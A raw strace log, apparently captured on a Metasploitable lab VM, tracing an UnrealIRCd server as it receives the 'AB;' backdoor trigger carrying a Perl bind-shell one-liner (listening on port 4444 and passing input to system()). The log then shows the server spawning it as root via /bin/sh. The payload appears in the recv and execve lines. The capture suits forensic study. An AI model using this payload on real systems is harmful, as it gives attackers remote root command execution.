4519  07:44:00.884412 select(1024, [2 3 4 7 9], [], NULL, {0, 480000}) = 1 (in [2], left {0, 300000})

4519  07:44:01.062265 clock_gettime(CLOCK_MONOTONIC, {3050, 879286610}) = 0

4519  07:44:01.062287 time(NULL)        = 1495626241

4519  07:44:01.062297 time(NULL)        = 1495626241

4519  07:44:01.062314 gettimeofday({1495626241, 62319}, NULL) = 0

4519  07:44:01.062327 select(1024, [2], [], NULL, {0, 0}) = 1 (in [2], left {0, 0})

4519  07:44:01.062366 clock_gettime(CLOCK_MONOTONIC, {3050, 879379117}) = 0

4519  07:44:01.062376 gettimeofday({1495626241, 62380}, NULL) = 0

4519  07:44:01.062387 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [2], left {1, 0})

4519  07:44:01.062425 clock_gettime(CLOCK_MONOTONIC, {3050, 879437782}) = 0

4519  07:44:01.062436 accept(2, 0, NULL) = 5

4519  07:44:01.062455 getpeername(5, {sa_family=AF_INET, sin_port=htons(34353), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:44:01.062486 fcntl64(5, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:44:01.062498 fcntl64(5, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:44:01.062511 setsockopt(5, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:44:01.062523 setsockopt(5, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:44:01.062534 setsockopt(5, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:44:01.062545 getsockopt(5, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:44:01.062559 setsockopt(5, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:44:01.062717 clock_gettime(CLOCK_MONOTONIC, {3050, 879733689}) = 0

4519  07:44:01.062747 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 6

4519  07:44:01.062759 fcntl64(6, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:44:01.062790 fcntl64(6, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:44:01.062799 fcntl64(6, F_SETFD, FD_CLOEXEC) = 0

4519  07:44:01.062809 connect(6, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:44:01.062923 send(6, "\276\\\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:44:01.063002 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:44:01.063026 gettimeofday({1495626241, 63030}, NULL) = 0

4519  07:44:01.063127 select(1024, [2 3 4 6 7 9], [], NULL, {1, 0}) = 1 (in [6], left {1, 0})

4519  07:44:01.065919 clock_gettime(CLOCK_MONOTONIC, {3050, 882936176}) = 0

4519  07:44:01.065936 recvfrom(6, "\276\\\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\350\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:44:01.065977 close(6)          = 0

4519  07:44:01.065992 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:44:01.066007 send(5, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:44:01.066103 time(NULL)        = 1495626241

4519  07:44:01.066116 time(NULL)        = 1495626241

4519  07:44:01.066128 gettimeofday({1495626241, 66132}, NULL) = 0

4519  07:44:01.066154 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:44:01.066203 clock_gettime(CLOCK_MONOTONIC, {3050, 883216475}) = 0

4519  07:44:01.066274 gettimeofday({1495626241, 66279}, NULL) = 0

4519  07:44:01.066286 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 1 (in [4], left {0, 450000})

4519  07:44:01.613152 clock_gettime(CLOCK_MONOTONIC, {3051, 430200085}) = 0

4519  07:44:01.613239 recv(4, "PRIVMSG  #testit Hiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii\n", 8192, 0) = 54

4519  07:44:01.613308 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613345 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613386 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613402 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613416 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613440 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613454 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613468 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613482 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613536 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613550 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613605 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613645 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613660 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613692 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613705 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613719 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613733 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613747 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613761 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613774 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613788 getrusage(RUSAGE_SELF, {ru_utime={0, 20000}, ru_stime={0, 590000}, ...}) = 0

4519  07:44:01.613805 gettimeofday({1495626241, 613809}, NULL) = 0

4519  07:44:01.613818 select(1024, [2 3 4 5 7 9], [], NULL, {1, 0}) = 1 (in [5], left {1, 0})

4519  07:44:01.613861 clock_gettime(CLOCK_MONOTONIC, {3051, 430873952}) = 0

4519  07:44:01.613873 recv(5, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:44:01.613902 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:44:01.613922 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:44:01.613934 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:44:01.613949 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 12763

12763 07:44:01.614039 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

12763 07:44:01.614054 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

12763 07:44:01.614079 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

12763 07:44:01.614123 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

12763 07:44:01.614248 brk(0)            = 0x80f9000

12763 07:44:01.614270 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12763 07:44:01.614287 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f42000

12763 07:44:01.614304 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

12763 07:44:01.614321 open("/etc/ld.so.cache", O_RDONLY) = 1

12763 07:44:01.614334 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12763 07:44:01.614353 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f3a000

12763 07:44:01.614363 close(1)          = 0

12763 07:44:01.614374 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12763 07:44:01.614390 open("/lib/libncurses.so.5", O_RDONLY) = 1

12763 07:44:01.614403 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

12763 07:44:01.614502 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

12763 07:44:01.614520 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f0a000

12763 07:44:01.614533 mmap2(0xb7f37000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f37000

12763 07:44:01.614549 close(1)          = 0

12763 07:44:01.614573 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12763 07:44:01.614632 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

12763 07:44:01.614647 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

12763 07:44:01.614753 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

12763 07:44:01.614770 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f06000

12763 07:44:01.614781 mmap2(0xb7f08000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f08000

12763 07:44:01.614797 close(1)          = 0

12763 07:44:01.614809 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12763 07:44:01.614823 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

12763 07:44:01.614837 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

12763 07:44:01.614929 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

12763 07:44:01.614946 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f05000

12763 07:44:01.614960 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7db6000

12763 07:44:01.614971 mmap2(0xb7eff000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7eff000

12763 07:44:01.614986 mmap2(0xb7f02000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f02000

12763 07:44:01.615000 close(1)          = 0

12763 07:44:01.615022 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7db5000

12763 07:44:01.615034 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7db56b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

12763 07:44:01.615129 mprotect(0xb7eff000, 4096, PROT_READ) = 0

12763 07:44:01.615182 munmap(0xb7f3a000, 29913) = 0

12763 07:44:01.615208 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12763 07:44:01.615222 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

12763 07:44:01.615242 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbf9fabc0) = -1 ENOTTY (Inappropriate ioctl for device)

12763 07:44:01.615273 brk(0)            = 0x80f9000

12763 07:44:01.615283 brk(0x80fa000)    = 0x80fa000

12763 07:44:01.615295 brk(0x80fb000)    = 0x80fb000

12763 07:44:01.615312 getuid32()        = 0

12763 07:44:01.615321 getgid32()        = 0

12763 07:44:01.615330 geteuid32()       = 0

12763 07:44:01.615339 getegid32()       = 0

12763 07:44:01.615353 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12763 07:44:01.615366 time(NULL)        = 1495626241

12763 07:44:01.615379 brk(0x80fc000)    = 0x80fc000

12763 07:44:01.615393 brk(0x80fd000)    = 0x80fd000

12763 07:44:01.615413 open("/proc/meminfo", O_RDONLY) = 1

12763 07:44:01.615434 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

12763 07:44:01.615452 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f41000

12763 07:44:01.615464 read(1, "MemTotal:      1035240 kB\nMemFree:        302916 kB\nBuffers:         90096 kB\nCached:         480660 kB\nSwapCached:          0 kB\nActive:         258272 kB\nInactive:       441448 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        302676 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4152 kB\nWriteback:           0 kB\nAnonPages:      128980 kB\nMapped:          52004 kB\nSlab:            21340 kB\nSReclaimable:    12448 kB\nSUnreclaim:       8892 kB\nPageTables:       1960 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

12763 07:44:01.615548 close(1)          = 0

12763 07:44:01.615569 munmap(0xb7f41000, 4096) = 0

12763 07:44:01.615606 brk(0x80fe000)    = 0x80fe000

12763 07:44:01.615650 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12763 07:44:01.615664 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

12763 07:44:01.615676 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12763 07:44:01.615688 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

12763 07:44:01.615700 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

12763 07:44:01.615712 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

12763 07:44:01.615725 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

12763 07:44:01.615737 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

12763 07:44:01.615750 uname({sys="Linux", node="metasploitable", ...}) = 0

12763 07:44:01.615815 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

12763 07:44:01.615833 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12763 07:44:01.615850 brk(0x8100000)    = 0x8100000

12763 07:44:01.615861 getcwd("/etc/unreal", 4096) = 12

12763 07:44:01.615875 getpid()          = 12763

12763 07:44:01.615892 getppid()         = 4519

12763 07:44:01.615907 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

12763 07:44:01.615926 stat64("/sbin/sh", 0xbf9fab98) = -1 ENOENT (No such file or directory)

12763 07:44:01.615938 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12763 07:44:01.615955 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

12763 07:44:01.615979 socket(PF_FILE, SOCK_STREAM, 0) = 1

12763 07:44:01.615992 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12763 07:44:01.616004 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12763 07:44:01.616025 close(1)          = 0

12763 07:44:01.616036 socket(PF_FILE, SOCK_STREAM, 0) = 1

12763 07:44:01.616046 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

12763 07:44:01.616102 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

12763 07:44:01.616137 close(1)          = 0

12763 07:44:01.616167 open("/etc/nsswitch.conf", O_RDONLY) = 1

12763 07:44:01.616182 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

12763 07:44:01.616199 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f41000

12763 07:44:01.616210 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

12763 07:44:01.616259 read(1, "", 4096) = 0

12763 07:44:01.616269 close(1)          = 0

12763 07:44:01.616278 munmap(0xb7f41000, 4096) = 0

12763 07:44:01.616294 open("/etc/ld.so.cache", O_RDONLY) = 1

12763 07:44:01.616307 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

12763 07:44:01.616323 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f3a000

12763 07:44:01.616333 close(1)          = 0

12763 07:44:01.616344 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12763 07:44:01.616358 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

12763 07:44:01.616373 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

12763 07:44:01.616463 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

12763 07:44:01.616481 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dac000

12763 07:44:01.616493 mmap2(0xb7db3000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7db3000

12763 07:44:01.616513 close(1)          = 0

12763 07:44:01.616525 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

12763 07:44:01.616538 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

12763 07:44:01.616580 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

12763 07:44:01.616686 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

